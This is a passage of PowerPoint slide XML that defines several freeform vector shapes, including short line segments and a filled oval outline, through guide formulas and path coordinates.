            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 135"/>
              <a:gd name="T1" fmla="*/ 0 h 40"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 135"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 40"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 135"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 40"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 135"/>
              <a:gd name="T7" fmla="*/ 0 h 40"/>
              <a:gd name="T8" fmla="*/ 0 w 135"/>
              <a:gd name="T9" fmla="*/ 0 h 40"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 135"/>
              <a:gd name="T16" fmla="*/ 0 h 40"/>
              <a:gd name="T17" fmla="*/ 135 w 135"/>
              <a:gd name="T18" fmla="*/ 40 h 40"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="135" h="40">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="132" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5"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297" name="Freeform 378"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1446212" y="7766050"/>
            <a:ext cx="298450" cy="79375"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 132"/>
              <a:gd name="T1" fmla="*/ 0 h 35"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 35"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 35"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T7" fmla="*/ 0 h 35"/>
              <a:gd name="T8" fmla="*/ 0 w 132"/>
              <a:gd name="T9" fmla="*/ 0 h 35"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 132"/>
              <a:gd name="T16" fmla="*/ 0 h 35"/>
              <a:gd name="T17" fmla="*/ 132 w 132"/>
              <a:gd name="T18" fmla="*/ 35 h 35"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="132" h="35">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="130" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4"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298" name="Freeform 379"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1423987" y="7770813"/>
            <a:ext cx="300038" cy="85725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 133"/>
              <a:gd name="T1" fmla="*/ 0 h 38"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 133"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 133"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 133"/>
              <a:gd name="T7" fmla="*/ 0 h 38"/>
              <a:gd name="T8" fmla="*/ 0 w 133"/>
              <a:gd name="T9" fmla="*/ 0 h 38"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 133"/>
              <a:gd name="T16" fmla="*/ 0 h 38"/>
              <a:gd name="T17" fmla="*/ 133 w 133"/>
              <a:gd name="T18" fmla="*/ 38 h 38"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="133" h="38">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="130" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3"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299" name="Freeform 380"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2519362" y="7054850"/>
            <a:ext cx="735013" cy="147638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T1" fmla="*/ 0 h 65"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T20" fmla="*/ 0 w 326"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T22" fmla="*/ 0 w 326"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T24" fmla="*/ 0 w 326"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T91" fmla="*/ 0 h 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6"/>
              <a:gd name="T139" fmla="*/ 0 h 65"/>
              <a:gd name="T140" fmla="*/ 326 w 326"/>
              <a:gd name="T141" fmla="*/ 65 h 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6" h="65">
                <a:moveTo>
                  <a:pt x="162" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="146" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="309" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="309" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10300" name="Freeform 381"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2519362" y="7054850"/>
            <a:ext cx="735013" cy="147638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T1" fmla="*/ 0 h 65"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T20" fmla="*/ 0 w 326"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T22" fmla="*/ 0 w 326"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T24" fmla="*/ 0 w 326"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 326"/>
              <a:gd name="T91" fmla="*/ 0 h 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6"/>
              <a:gd name="T139" fmla="*/ 0 h 65"/>
              <a:gd name="T140" fmla="*/ 326 w 326"/>
              <a:gd name="T141" fmla="*/ 65 h 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6" h="65">
                <a:moveTo>
                  <a:pt x="162" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="146" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="61"/>
                </a:lnTo>
                <a:lnTo>
